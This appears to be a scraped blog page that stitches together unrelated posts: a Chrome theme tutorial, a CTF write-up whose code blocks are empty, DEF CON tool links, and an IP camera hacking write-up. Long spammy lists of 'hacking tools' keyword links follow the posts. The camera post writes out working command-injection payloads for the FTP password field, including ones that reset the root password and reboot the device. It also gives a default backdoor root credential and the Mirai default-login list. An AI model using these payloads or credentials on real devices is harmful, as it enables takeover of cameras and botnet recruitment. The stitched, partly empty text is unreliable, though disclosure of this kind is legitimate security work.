Pages

Wednesday, May 31, 2023

How To Change Facebook’s Default Theme To Any Color You Want

Change Facebook Theme Using Chrome Extension

How To Change Facebook's Default Theme To Any Color You Want

We are going to share an interesting trick on changing your Facebook default theme. You just need a Google Chrome extension to perform this trick. If you are among me who feels very fatigued with the look of Facebook's by default theme then this is a must-see post because you will find out the easiest trick to make your facebook more attractive than before.

Facebook is a social networking site which empowers people to connect with friends and people around. That's how Facebook is habitually introduced. However, Facebook is beyond the need of being introduced as almost everyone is on it.
   A couple of Days ago I was simply Surfing Google Chrome website and I somehow stumbled upon a Chrome Extension. Yes, a Chrome extension that will give your Facebook a Whole new look. I was apprehensive to try it, So I just installed it and checked my facebook. I was astonished to see my facebook homepage have all new look. I found it refreshing and decided to write steps on How to Change Facebook Themes using Chrome Extension.

How To Change Facebook's Default Theme To Any Color You Want

If You are among me who feels very fatigued with the look of Facebook's by default theme then this is a must-see post, Because you will find out the easiest trick to make your facebook more attractive than before. Simply follow the steps to know about it.

How to Change Facebook Theme Using Chrome Extension

Step 1. Install Stylish for Chrome from the Chrome Web Store. It will take hardly a minute to get installed in your Chrome browser.
Change Facebook Theme Using Chrome Extension
Change Facebook Theme Using Chrome Extension
Step 2. Navigate to Facebook.com and click on the S button. Click on Find Styles for this Site to open a new tab with free themes to use for Facebook. Most of the themes are free and attractive too you can easily browse over the full website to discover your favorite theme.
Change Facebook Theme Using Chrome Extension
Change Facebook Theme Using Chrome Extension
Step 3. Now You will be redirected towards https://userstyles.org Guess what! This site contains huge numbers of Facebook themes, One thing is for sure that you will be confused in-between what to select and which one to skip. Select any them and click on it. Now you will be given a full preview of your selected theme.
Change Facebook Theme Using Chrome Extension
Change Facebook Theme Using Chrome Extension
Step 4. If everything is fine in the previewed theme, click on Install with Stylish button at the top right corner of the page. It will take few seconds or minutes depends on your theme size to be installed in Stylish Extension, once installed you will be notified with a success message.
Change Facebook Theme Using Chrome Extension
Change Facebook Theme Using Chrome Extension
Step 5. Now whenever you open Facebook, it will show the theme that you have installed with Stylish instead of the boring old blue theme.
Change Facebook Theme Using Chrome Extension
Change Facebook Theme Using Chrome Extension
More information

ASIS CTF Quals 2015 - Sawthis Writeup - Srand Remote Prediction


The remote service ask for a name, if you send more than 64 bytes, a memory leak happens.
The buffer next to the name's is the first random value used to init the srand()


If we get this value, and set our local srand([leaked] ^ [luckyNumber]) we will be able to predict the following randoms and win the game, but we have to see few details more ;)

The function used to read the input until the byte \n appears, but also up to 64 bytes, if we trigger this second condition there is not 0x00 and the print shows the random buffer :)

The nickname buffer:



The seed buffer:



So here it is clear, but let's see that the random values are computed with several gpu instructions which are decompiled incorrectly:







We tried to predict the random and aply the gpu divisions without luck :(



There was a missing detail in this predcitor, but there are always other creative ways to do the things.
We use the local software as a predictor, we inject the leaked seed on the local binary of the remote server and got a perfect syncronization, predicting the remote random values:




The process is a bit ugly becouse we combined automated process of leak exctraction and socket interactive mode, with the manual gdb macro.




The macro:



















Related posts
  1. Hack Rom Tools
  2. Hacker Security Tools
  3. Hacker Tools
  4. Pentest Tools Tcp Port Scanner
  5. Pentest Tools Alternative
  6. Hack Tools For Games
  7. Hak5 Tools
  8. Hack Tools Github
  9. Hack Tools For Games
  10. Hacking Tools For Windows 7
  11. Hacker Tools Software
  12. Pentest Tools Url Fuzzer
  13. Github Hacking Tools
  14. Hacker Tool Kit
  15. Easy Hack Tools
  16. Pentest Tools Website
  17. How To Make Hacking Tools
  18. Hackers Toolbox
  19. Hacker
  20. Hacking Tools Download
  21. Pentest Tools Subdomain
  22. Growth Hacker Tools
  23. Game Hacking
  24. Pentest Tools Subdomain
  25. Pentest Tools Port Scanner
  26. Hack Rom Tools
  27. Hacker Tools Linux
  28. Pentest Tools Linux
  29. Hack Tools For Pc
  30. Pentest Tools Alternative
  31. Hack Tools 2019
  32. Hacker Tools Apk
  33. Pentest Tools Download
  34. Hack Tools For Games
  35. Physical Pentest Tools
  36. Underground Hacker Sites
  37. Hacker Tools Linux
  38. Hacker Tools Software
  39. How To Make Hacking Tools
  40. Hacking Tools Online
  41. Hacking Tools Pc
  42. Hacker Tools Free
  43. Nsa Hack Tools Download
  44. World No 1 Hacker Software
  45. Tools Used For Hacking
  46. Hacker Tools Hardware
  47. Pentest Tools Url Fuzzer
  48. Underground Hacker Sites
  49. Github Hacking Tools
  50. Top Pentest Tools
  51. Game Hacking
  52. New Hacker Tools
  53. Hacks And Tools
  54. Pentest Automation Tools
  55. How To Hack
  56. Wifi Hacker Tools For Windows
  57. Hack And Tools
  58. Hacking Tools Kit
  59. Beginner Hacker Tools
  60. Hack Tools For Mac
  61. Hacking Tools For Kali Linux
  62. Kik Hack Tools
  63. New Hack Tools
  64. Hack Tools
  65. Hacker Tools Windows
  66. Hacking Tools And Software
  67. Top Pentest Tools
  68. Hacking Tools For Windows
  69. Hacking Tools Download
  70. Hacker Techniques Tools And Incident Handling
  71. Hacking Tools Github
  72. Pentest Tools Github
  73. Game Hacking
  74. Pentest Tools Online
  75. Pentest Tools Find Subdomains
  76. Hacker Tools Apk Download
  77. Best Hacking Tools 2020
  78. Hack Apps
  79. Hacking Tools Download
  80. Hacks And Tools
  81. Tools Used For Hacking
  82. Hack Tools
  83. Pentest Tools Subdomain
  84. Hack Tool Apk
  85. Pentest Tools Port Scanner
  86. Pentest Tools Download
  87. Nsa Hack Tools
  88. Pentest Tools Android
  89. Hacker Tools Apk Download

Tuesday, May 30, 2023

Bypass Hardware Firewalls

This is just a collection of links about my DEF CON 22 presentation, and the two tools I released:

Slides:
http://www.slideshare.net/bz98/defcon-22-bypass-firewalls-application-white-lists-secure-remote-desktops-in-20-seconds

Tools:
https://github.com/MRGEffitas/Write-into-screen
https://github.com/MRGEffitas/hwfwbypass

Presentation video from Hacktivity:
https://www.youtube.com/watch?v=KPJBckmhtZ8

Technical blog post:
https://blog.mrg-effitas.com/bypass-hardware-firewalls-def-con-22/

Have fun!




Related links


How I Hacked My IP Camera, And Found This Backdoor Account

The time has come. I bought my second IoT device - in the form of a cheap IP camera. As it was the most affordable among all others, my expectations regarding security was low. But this camera was still able to surprise me.

Maybe I will disclose the camera model used in my hack in this blog later, but first, I will try to contact someone regarding these issues. Unfortunately, it seems a lot of different cameras have this problem because they share being developed on the same SDK. Again, my expectations are low on this.

The obvious problems



I opened the box, and I was greeted with a password of four numeric characters. This is the password for the "admin" user, which can configure the device, watch its output video, and so on. Most people don't care to change this anyway.

It is obvious that this camera can talk via Ethernet cable or WiFi. Luckily it supports WPA2, but people can configure it for open unprotected WiFi of course. 

Sniffing the traffic between the camera and the desktop application it is easy to see that it talks via HTTP on port 81. The session management is pure genius. The username and password are sent in every GET request. Via HTTP. Via hopefully not open WiFi. It comes really handy in case you forgot it, but luckily the desktop app already saved the password for you in clear text in 
"C:\Users\<USER>\AppData\Local\VirtualStore\Program Files (x86)\<REDACTED>\list.dat"

This nice camera communicates to the cloud via UDP. The destination servers are in Hong Kong - user.ipcam.hk/user.easyn.hk - and China - op2.easyn.cn/op3.easyn.cn. In case you wonder why an IP camera needs a cloud connection, it is simple. This IP camera has a mobile app for Android and iOS, and via the cloud, the users don't have to bother to configure port forwards or dynamic DNS to access the camera. Nice.

Let's run a quick nmap on this device.
PORT     STATE SERVICE    VERSION 23/tcp   open  telnet     BusyBox telnetd 81/tcp   open  http       GoAhead-Webs httpd | http-auth:  | HTTP/1.1 401 Unauthorized |_  Digest algorithm=MD5 opaque=5ccc069c403ebaf9f0171e9517f40e41 qop=auth realm=GoAhead stale=FALSE nonce=99ff3efe612fa44cdc028c963765867b domain=:81 |_http-methods: No Allow or Public header in OPTIONS response (status code 400) |_http-title: Document Error: Unauthorized 8600/tcp open  tcpwrapped 
The already known HTTP server, a telnet server via BusyBox, and a port on 8600 (have not checked so far). The 27-page long online manual does not mention any Telnet port. How shall we name this port? A debug port? Or a backdoor port? We will see. I manually tried 3 passwords for the user root, but as those did not work, I moved on.

The double-blind command injection

The IP camera can upload photos to a configured FTP server on a scheduled basis. When I configured it, unfortunately, it was not working at all, I got an invalid username/password on the server. After some debugging, it turned out the problem was that I had a special $ character in the password. And this is where the real journey began. I was sure this was a command injection vulnerability, but not sure how to exploit it. There were multiple problems that made the exploitation harder. I call this vulnerability double-blind command injection. The first blind comes from the fact that we cannot see the output of the command, and the second blind comes from the fact that the command was running in a different process than the webserver, thus any time-based injection involving sleep was not a real solution.
But the third problem was the worst. It was limited to 32 characters. I was able to leak some information via DNS, like with the following commands I was able to see the current directory:
$(ping%20-c%202%20%60pwd%60)
or cleaning up after URL decode:
$(ping -c 2 `pwd`)
but whenever I tried to leak information from /etc/passwd, I failed. I tried $(reboot) which was a pretty bad idea, as it turned the camera into an infinite reboot loop, and the hard reset button on the camera failed to work as well. Fun times.

The following are some examples of my desperate trying to get shell access. And this is the time to thank EQ for his help during the hacking session night, and for his great ideas.
$(cp /etc/passwd /tmp/a)       ;copy /etc/passwd to a file which has a shorter name $(cat /tmp/a|head -1>/tmp/b)   ;filter for the first row $(cat</tmp/b|tr -d ' '>/tmp/c) ;filter out unwanted characters $(ping `cat /tmp/c`)           ;leak it via DNS 
After I finally hacked the camera, I saw the problem. There is no head, tr, less, more or cut on this device ... Neither netcat, bash ...

I also tried commix, as it looked promising on Youtube. Think commix like sqlmap, but for command injection. But this double-blind hack was a bit too much for this automated tool, unfortunately.



But after spending way too much time without progress, I finally found the password to Open Sesame.
$(echo 'root:passwd'|chpasswd)
Now, logging in via telnet
(none) login: root Password:  BusyBox v1.12.1 (2012-11-16 09:58:14 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. #  
Woot woot :) I quickly noticed the root of the command injection problem:

# cat /tmp/ftpupdate.sh /system/system/bin/ftp -n<<! open ftp.site.com 21 user ftpuser $(echo 'root:passwd'|chpasswd) binary mkdir  PSD-111111-REDACT cd PSD-111111-REDACT lcd /tmp put 12.jpg 00_XX_XX_XX_XX_CA_PSD-111111-REDACT_0_20150926150327_2.jpg close bye 

Whenever a command is put into the FTP password field, it is copied into this script, and after the script is scheduled, it is interpreted by the shell as commands. After this I started to panic that I forgot to save the content of the /etc/passwd file, so how am I going to crack the default telnet password? "Luckily", rebooting the camera restored the original password. 

root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh

Unfortunately, there is no need to start good-old John The Ripper for this task, as Google can tell you that this is the hash for the password 123456. It is a bit more secure than a luggage password.



It is time to recap what we have. There is an undocumented telnet port on the IP camera, which can be accessed by default with root:123456, there is no GUI to change this password, and changing it via console, it only lasts until the next reboot. I think it is safe to tell this a backdoor.
With this console access we can access the password for the FTP server, for the SMTP server (for alerts), the WiFi password (although we probably already have it), access the regular admin interface for the camera, or just modify the camera as we want. In most deployments, luckily this telnet port is behind NAT or firewall, so not accessible from the Internet. But there are always exceptions. Luckily, UPNP does not configure the Telnet port to be open to the Internet, only the camera HTTP port 81. You know, the one protected with the 4 character numeric password by default.

Last but not least everything is running as root, which is not surprising. 

My hardening list

I added these lines to the end of /system/init/ipcam.sh:
sleep 15 echo 'root:CorrectHorseBatteryRedStaple'|chpasswd 
Also, if you want, you can disable the telnet service by commenting out telnetd in /system/init/ipcam.sh.

If you want to disable the cloud connection (thus rendering the mobile apps unusable), put the following line into the beginning of /system/init/ipcam.sh
iptables -A OUTPUT -p udp ! --dport 53 -j DROP
 
You can use OpenVPN to connect into your home network and access the web interface of the camera. It works from Android, iOS, and any desktop OS.

My TODO list

  • Investigate the script /system/system/bin/gmail_thread
  • Investigate the cloud protocol * - see update 2016 10 27
  • Buy a Raspberry Pie, integrate with a good USB camera, and watch this IP camera to burn
A quick googling revealed I am not the first finding this telnet backdoor account in IP cameras, although others found it via JTAG firmware dump. 

And 99% of the people who buy these IP cameras think they will be safe with it. Now I understand the sticker which came with the IP camera.


When in the next episode of Mr. Robot, you see someone logging into an IP camera via telnet with root:123456, you will know, it is the sad reality.

If you are interested in generic ways to protect your home against IoT, read my previous blog post on this. 

Update: as you can see in the following screenshot, the bad guys already started to take advantage of this issue ... https://www.incapsula.com/blog/cctv-ddos-botnet-back-yard.html

Update 20161006: The Mirai source code was leaked last week, and these are the worst passwords you can have in an IoT device. If your IoT device has a Telnet port open (or SSH), scan for these username/password pairs.

root     xc3511
root     vizxv
root     admin
admin    admin
root     888888
root     xmhdipc
root     default
root     juantech
root     123456
root     54321
support  support
root     (none)
admin    password
root     root
root     12345
user     user
admin    (none)
root     pass
admin    admin1234
root     1111
admin    smcadmin
admin    1111
root     666666
root     password
root     1234
root     klv123
Administrator admin
service  service
supervisor supervisor
guest    guest
guest    12345
guest    12345
admin1   password
administrator 1234
666666   666666
888888   888888
ubnt     ubnt
root     klv1234
root     Zte521
root     hi3518
root     jvbzd
root     anko
root     zlxx.
root     7ujMko0vizxv
root     7ujMko0admin
root     system
root     ikwb
root     dreambox
root     user
root     realtek
root     00000000
admin    1111111
admin    1234
admin    12345
admin    54321
admin    123456
admin    7ujMko0admin
admin    1234
admin    pass
admin    meinsm
tech     tech
mother   fucker

Update 2016 10 27: As I already mentioned this at multiple conferences, the cloud protocol is a nightmare. It is clear-text, and even if you disabled port-forward/UPNP on your router, the cloud protocol still allows anyone to connect to the camera if the attacker knows the (brute-forceable) camera ID. Although this is the user-interface only, now the attacker can use the command injection to execute code with root privileges. Or just grab the camera configuration, with WiFi, FTP, SMTP passwords included.
Youtube video : https://www.youtube.com/watch?v=18_zTjsngD8
Slides (29 - ) https://www.slideshare.net/bz98/iot-security-is-a-nightmare-but-what-is-the-real-risk

Update 2017-03-08: "Because of code reusing, the vulnerabilities are present in a massive list of cameras (especially the InfoLeak and the RCE),
which allow us to execute root commands against 1250+ camera models with a pre-auth vulnerability. "https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt

Update 2017-05-11: CVE-2017-5674 (see above), and my command injection exploit was combined in the Persirai botnet. 120 000 cameras are expected to be infected soon. If you still have a camera like this at home, please consider the following recommendation by Amit Serper "The only way to guarantee that an affected camera is safe from these exploits is to throw it out. Seriously."
This issue might be worse than the Mirai worm because these effects cameras and other IoT behind NAT where UPnP was enabled.
http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/


More information

  1. Pentest Tools Linux
  2. Hacker Tools Online
  3. New Hack Tools
  4. Hacking Tools Usb
  5. Hack Tools For Games
  6. Pentest Tools Find Subdomains
  7. What Is Hacking Tools
  8. Pentest Tools Apk
  9. Install Pentest Tools Ubuntu
  10. Hack Apps
  11. Pentest Tools Tcp Port Scanner
  12. Hacker Security Tools
  13. Pentest Tools Port Scanner
  14. Hacker Tools For Pc
  15. Hacking Tools For Windows 7
  16. Hacking Tools Hardware
  17. Hack Tool Apk
  18. Hacking Tools Name
  19. Pentest Tools Nmap
  20. Hacking Tools 2020
  21. Hacker Tools Mac
  22. Hacking Tools Online
  23. Hacking Tools Pc
  24. Hacking Tools Hardware
  25. Hacker Tools For Pc
  26. Pentest Tools For Ubuntu
  27. Best Hacking Tools 2020
  28. Hacking Tools Kit
  29. Pentest Tools Open Source
  30. Hack Website Online Tool
  31. What Are Hacking Tools
  32. Pentest Tools For Windows
  33. Underground Hacker Sites
  34. Hacking Tools For Windows Free Download
  35. Hacker
  36. Hacking Tools Mac
  37. Hack Tools Mac
  38. Hacking Tools Pc
  39. Hacker Tools Online
  40. Hack Apps
  41. Pentest Tools Tcp Port Scanner
  42. Hacker Tools Linux
  43. Free Pentest Tools For Windows
  44. Hack Tools
  45. Hack Tools 2019
  46. Underground Hacker Sites
  47. Hack App
  48. Pentest Tools Download
  49. Hacking Tools For Windows 7
  50. Best Pentesting Tools 2018
  51. Pentest Tools
  52. Pentest Tools Bluekeep
  53. Pentest Tools Alternative
  54. Pentest Automation Tools
  55. Hack Tools Mac
  56. Install Pentest Tools Ubuntu
  57. Hacker Tools List
  58. Pentest Tools Free
  59. Usb Pentest Tools
  60. Pentest Tools Tcp Port Scanner
  61. Hack Tools For Games
  62. Nsa Hacker Tools
  63. Hack Tools Online
  64. Hacker Tools Mac
  65. Hacker Tools
  66. Hacker Tools Apk Download
  67. Tools Used For Hacking
  68. Hacker Tools Apk
  69. Hack Tools For Mac
  70. Hacker Tools For Ios
  71. Hacking Tools 2020
  72. Tools 4 Hack
  73. Pentest Tools For Ubuntu
  74. Hack Tools For Games
  75. How To Hack
  76. Ethical Hacker Tools
  77. Pentest Tools Online
  78. Hacker Security Tools
  79. Hacker Tools Free Download
  80. Underground Hacker Sites
  81. Beginner Hacker Tools
  82. Hack Tools For Mac
  83. Hacking Tools For Games
  84. What Are Hacking Tools
  85. Hack Website Online Tool
  86. Hacking Tools Windows 10
  87. Hacker Tools Apk Download
  88. Hacking Tools For Pc
  89. Hacker Tools 2020
  90. Pentest Tools Review
  91. Pentest Tools Open Source
  92. Hacking Tools Github
  93. Hack Tools Mac
  94. Pentest Tools Open Source
  95. Pentest Tools Download
  96. Hack Tools Download
  97. Hacking Tools
  98. Pentest Tools For Mac
  99. Nsa Hack Tools Download
  100. Hacking Tools 2020
  101. Hacking Tools 2020
  102. Bluetooth Hacking Tools Kali
  103. Hacker Tools 2020
  104. Hacker Tools List
  105. Best Hacking Tools 2019
  106. Pentest Reporting Tools
  107. Best Hacking Tools 2020
  108. Hack Tools Online
  109. Hacker Tools Github
  110. Tools For Hacker
  111. Hack Tools 2019
  112. Hacking Tools For Games
  113. Hacker Tools Free
  114. Hacking Tools Hardware
  115. Hack And Tools
  116. Blackhat Hacker Tools
  117. Hack Tools For Windows
  118. Hack Tools Download
  119. Top Pentest Tools
  120. Hacking Tools Github
  121. Hacking Tools Software
  122. Tools For Hacker
  123. Tools For Hacker
  124. Beginner Hacker Tools
  125. Pentest Tools Alternative
  126. Hacker Tools Apk Download
  127. Usb Pentest Tools
  128. Hak5 Tools
  129. Hacking Tools For Kali Linux
  130. Hacking Tools Pc
  131. Hak5 Tools
  132. Android Hack Tools Github
  133. How To Make Hacking Tools
  134. Hacker Tools For Mac
  135. Pentest Tools For Windows
  136. Best Hacking Tools 2020
  137. Blackhat Hacker Tools
  138. Hack Tools For Pc
  139. Pentest Tools For Mac
  140. Hacker Tools Free Download
  141. Hacking Tools Kit
  142. Pentest Tools For Mac
  143. How To Make Hacking Tools
  144. Hacker Tools
  145. Pentest Tools Alternative
  146. Hacking Tools Software
  147. How To Hack